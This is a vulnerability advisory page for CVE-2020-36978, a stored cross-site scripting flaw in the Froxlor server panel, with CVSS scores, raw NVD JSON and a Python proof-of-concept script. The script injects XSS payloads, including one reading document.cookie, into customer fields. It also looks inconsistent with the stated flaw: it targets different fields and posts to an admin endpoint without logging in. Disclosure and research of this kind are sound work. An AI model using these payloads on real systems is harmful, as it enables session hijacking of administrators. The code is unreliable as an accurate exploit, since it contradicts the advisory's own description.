Security Vulnerability Report
CVE-2020-36978 CVSS 6.4 MEDIUM

CVE-2020-36978

Published: 2026-01-27 19:16:11
Last Modified: 2026-04-15 00:35:42

Description

Froxlor Server Management Panel 0.10.16 contains a persistent (stored) cross-site scripting vulnerability in the customer registration input fields. Attackers can inject malicious scripts through the username, name, and firstname parameters; the injected script executes in an administrator's browser when the administrator views the customer traffic module.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Froxlor Server Management Panel < 0.10.16
Froxlor 0.10.16 (已知受影响)
Froxlor 0.10.x 系列 (可能受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2020-36978 Stored XSS PoC # Target: Froxlor Server Management Panel 0.10.16 # Attack Vector: Customer Registration Input Fields import requests import json target_url = "http://target-server/froxlor/" # Malicious XSS payload for username, name, and firstname fields xss_payload = "<script>alert(document.cookie)</script>" # Customer registration endpoint registration_url = target_url + "admin.php?tab=customers&action=add" # Registration data with XSS payloads registration_data = { "loginname": "attacker_account", "password": "Password123!", "password_repeat": "Password123!", "email": "[email protected]", "firstname": xss_payload, "name": xss_payload, "company": xss_payload, "submit": "create" } print("[*] Sending malicious registration request...") response = requests.post(registration_url, data=registration_data) if response.status_code == 200: print("[+] XSS payload injected successfully!") print("[*] Payload will execute when admin views customer traffic module") print("[*] Payload: " + xss_payload) else: print("[-] Registration failed. Status code:", response.status_code) # Alternative: Direct API registration if available api_url = target_url + "api/v1/customers" api_headers = { "Content-Type": "application/json", "X-Api-Key": "your-api-key" } api_data = { "loginname": "attacker2", "email": "[email protected]", "firstname": "<img src=x onerror=alert(document.domain)>", "name": "<svg onload=alert(1)>", "password": "TestPass123!" } print("[*] Trying alternative API registration...") api_response = requests.post(api_url, headers=api_headers, json=api_data) print("[*] API Response:", api_response.text)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36978", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:10.597", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Froxlor Server Management Panel 0.10.16 contains a persistent cross-site scripting vulnerability in customer registration input fields. Attackers can inject malicious scripts through username, name, and firstname parameters to execute code when administrators view customer traffic modules."}, {"lang": "es", "value": "Froxlor Server Management Panel 0.10.16 contiene una vulnerabilidad persistente de cross-site scripting en los campos de entrada de registro de clientes. Atacantes pueden inyectar scripts maliciosos a través de los parámetros de nombre de usuario, nombre y primer nombre para ejecutar código cuando los administradores visualizan los módulos de tráfico de clientes."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://froxlor.org/", "source": "[email protected]"}, {"url": "https://froxlor.org/download/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49063", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/froxlor-froxlor-server-management-panel-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2241", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49063", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}